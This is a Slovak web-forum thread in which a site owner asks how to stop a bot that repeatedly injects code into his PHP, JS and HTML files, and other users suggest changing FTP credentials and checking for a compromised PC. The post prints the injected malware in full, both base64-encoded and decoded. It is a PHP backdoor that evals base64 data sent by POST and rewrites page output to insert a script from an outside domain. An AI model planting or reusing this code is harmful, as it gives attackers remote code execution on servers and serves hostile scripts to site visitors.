| | |
| Stránka: 1 z 1
| [ Príspevkov: 5 ] | |
Autor | Správa |
---|
Registrovaný: 11.10.09 Prihlásený: 06.08.10 Príspevky: 11 Témy: 6 | Napísal kudzo: 05.11.2009 8:46 | |
|
Zdravim vsetkych, mam dost Vazny problem so strankami. Tie su tvorene tak, ze priblizne 95% vsetkych stranok volam do indexu.php z databazy prikazom
Kód: <?php if(file_exists(intval("./".$_GET['id']).".php" )) include intval($_GET['id']).".php"; else echo "<br /><h1>Stránka nejestvuje</h1>"; ?> Vsetko fungovalo super skoro dva roky. Teraz nejaky robot vklada do mojho suboru index.php tento kod Kód: <?php eval(base64_decode('aWYoIWlzc2V0KCRkNzQxKSl7ZnVuY3Rpb24gZDc0KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/ Twvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk +NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2g oJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygk diwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2L CcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/8oW14+XSo/ KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/4nPicpKSRzPXByZWdfcm VwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1 iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM1J6ZFd0aGFYTjFkR1ZqYjI1MFlXTjBMbU52YlM5cGJ XRm5aWE12WjJsbWFXMW5MbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKS RzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuP SRhO3JldHVybiAkczt9ZnVuY3Rpb24gZDc0MigkYSwkYiwkYywkZCl7Z2xvYmFsICRkNzQxOyRzPWFycmF5KCk7aWYoZn VuY3Rpb25fZXhpc3RzKCRkNzQxKSljYWxsX3VzZXJfZnVuYygkZDc0MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V 0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdkNzQnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRs ZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk 9Y291bnQoJHMpLTE7JGkPTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGF ydCgnZDc0Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1 bMV07fX19JGQ3NGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2Q3NDInKSkhPSdkNzQyJyk/6MDtldmFsKGJhc2U2NF9 kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>
odkodovane to je Kód: <?php if(!isset($d741)){function d74($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3RzdWthaXN1dGVjb250YWN0LmNvbS9pbWFnZXMvZ2lmaW1nLnBocCA+PC9zY3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function d742($a,$b,$c,$d){global $d741;$s=array();if(function_exists($d741))call_user_func($d741,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='d74')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('d74');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$d74l=(($a=@set_error_handler('d742'))!='d742')?$a:0;eval(base64_decode($_POST['e'])); ?>
to sposoby chybu v PHP syntache a stranka sa (ne)zobrazi iba ako chybova hlaska PHP.
Neviem ako to moze vkladat ten skodlivy kod do suboru a este aj do js. a html. suborov, ktore mam v adresaroch v nepravidelnzch casovych intervaloch zhruba do 12 hod., ked to prepisem.. ako sa branit proti takemu utoku??
Na serveri som nastavil hodnoty funkcii allow_url_fopen a allow_url_include na Off, co som myslel ze pomoze, ale nic som tym neviriesil. Ako osetrit kod na includovanie udajov z databazy do stranok?
Vopred vdaka za kazdu radu a namet...
|
|
Registrovaný: 27.07.07 Príspevky: 3948 Témy: 51 Bydlisko: Bratislava |
zmen si heslo na ftp a nepouzivaj "nezabezpeceneho" ftp klienta, pripadne si este skontroluj, ci nemas napadnuty pc nejakou havedou...
_________________ NTB: Acer Aspire 4820TG 14" | CPU: Intel Core i5 2,53 GHz | VGA: ATI Mobility Radeon HD5650 1GB | RAM: 8GB DDR3 1066 MHz | HDD: 1TB SSD WD BLUE |
|
Registrovaný: 19.09.06 Prihlásený: 21.04.24 Príspevky: 749 Témy: 31 Bydlisko: Ružomberok&... | |
Registrovaný: 25.05.07 Prihlásený: 14.04.23 Príspevky: 346 Témy: 58 Bydlisko: Partizanske |
mal som podobny problem, potom som zmenil pristupove meno a heslo ineho klienta a nemam problem od tej doby
_________________ Ntbk 1: HP ProBook 640 Ntbk 2: HP EliteBook 840 G5 HTPC: Zotac Zbox BI320,120GB SSD, RAM 3Gb Konzola: Xbox ONE 1Tb TV: Samsung 65RU7402 Tel 1: Huawei P10lite |
|
Registrovaný: 09.07.08 Prihlásený: 17.01.15 Príspevky: 1585 Témy: 96 |
Podľa mňa by mal každý kurz a každá kniha o webových technológiách začať kapitolou "prečo neukladať heslá v total commanderi"
_________________ neříkejte, že něco nejde udělat, protože se vždycky najde nějaký blbec, co neví, že to nejde – a udělá to! |
|
| Stránka: 1 z 1
| [ Príspevkov: 5 ] | |
| Nemôžete zakladať nové témy v tomto fóre Nemôžete odpovedať na témy v tomto fóre Nemôžete upravovať svoje príspevky v tomto fóre Nemôžete mazať svoje príspevky v tomto fóre
|
|